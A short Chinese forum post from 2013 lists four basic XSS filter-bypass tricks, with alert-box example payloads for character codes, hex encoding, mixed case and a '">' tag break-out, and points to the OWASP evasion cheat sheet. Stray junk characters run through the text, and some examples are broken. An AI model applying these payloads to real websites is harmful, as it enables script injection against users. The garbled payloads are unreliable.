四种超级基础的绕过方法。
1 n& O5 D+ B' X7 ]- g1.转换为ASCII码) b/ v+ p8 X; `1 z# r( E
例子:原脚本为<script>alert(‘I love F4ck’)</script >
- M1 Q' ]; z0 z. q9 V" {% g5 }- m通过转换,变成: ^" h4 V+ z; C6 L- s
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script> v2 w0 B1 s8 d9 w& i! g
" F0 r0 K5 @9 ^2.转换为HEX(十六进制)
" w+ u8 o) s; w6 z- Q5 t# R例子:原脚本为<script>alert(‘I love F4ck’)</script>6 f8 ^; g7 `4 e6 Q( z. N
通过转换,变成:- M) Q3 O5 s0 l0 c; R$ W4 J
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
x/ h- U3 ?1 Z6 j8 i: B# z
4 E6 H) [5 Q/ H: @3.转换脚本的大小写5 C7 W+ g2 j3 h0 f. g* A- H
例子:原脚本为<script>alert(‘I love F4ck’)</script>
% D' s& w! e" T6 g4 I. c转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>* X b! s7 k0 E) b) i1 N4 [2 ]
9 K" S$ ~. M( T
4.增加闭合标记”>/ ^) F4 u' K$ P3 @" ~8 B. }6 z/ ]
例子:原脚本为<script>alert(‘I love F4ck’)</script>1 s" q) ] @2 r" a0 a
转换为:”><script>alert(‘I love F4ck’)</script>
$ q; [3 P: V3 n2 H* G" o7 W更详细绕过技术请参考此网页+ H0 y' h1 Y- y& ]9 ]% _$ z7 c
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet. @$ B: B" U8 _; z( A1 N, U# {
; V% u) n, f' L3 N4 ]/ n转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对